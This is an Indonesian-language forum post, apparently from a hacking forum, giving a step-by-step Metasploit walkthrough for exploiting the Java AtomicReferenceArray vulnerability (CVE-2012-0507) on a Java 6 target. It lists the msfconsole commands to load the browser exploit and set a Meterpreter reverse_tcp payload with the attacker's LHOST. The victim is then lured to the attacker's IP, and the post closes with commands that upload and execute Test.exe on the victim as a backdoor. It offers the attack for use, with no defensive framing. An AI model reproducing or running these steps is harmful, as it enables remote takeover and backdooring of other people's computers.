Exploiting the Java AtomicReferenceArray Type Violation Vulnerability
#1
target harus sudah intall java 6

1 buka terminal dan ketikkan msfconsole
2. gunakan exploit use exploit/multi/browser/java_atomicreferencearray
[Image: using_Java_CVE-2012-0507.jpg]

3.aur srvport dan uripath"set SRVPORT 80".
"set URIPATH /".
[Image: settings_srvport.jpg]

4.gunakan payload "set payload java/meterpreter/reverse_tcp"
[Image: Set_Payload.jpg]

5. atur lhost ip anda set LHOST [IP_address]
contoh set LHOST 192.168.56.10"
[Image: set_LHOST.jpg]

6. exploit
[Image: Exploiting_Metasploit.jpg]

7.buka mesin target dan masukkan http://192.168.56.10
[Image: Target-machine-connects.jpg]

8. dan liat hasilnya
[Image: session_meterpreter.jpg]

[Image: Meterpreter.jpg]

buat backdoor di korban ketika masuk mode meterpreter
''upload /Test.exe c:\\"
lalu eksekusi
execute -f C:\\Test.exe

[Image: Executing_RAT.jpg]






Users browsing this thread: 1 Guest(s)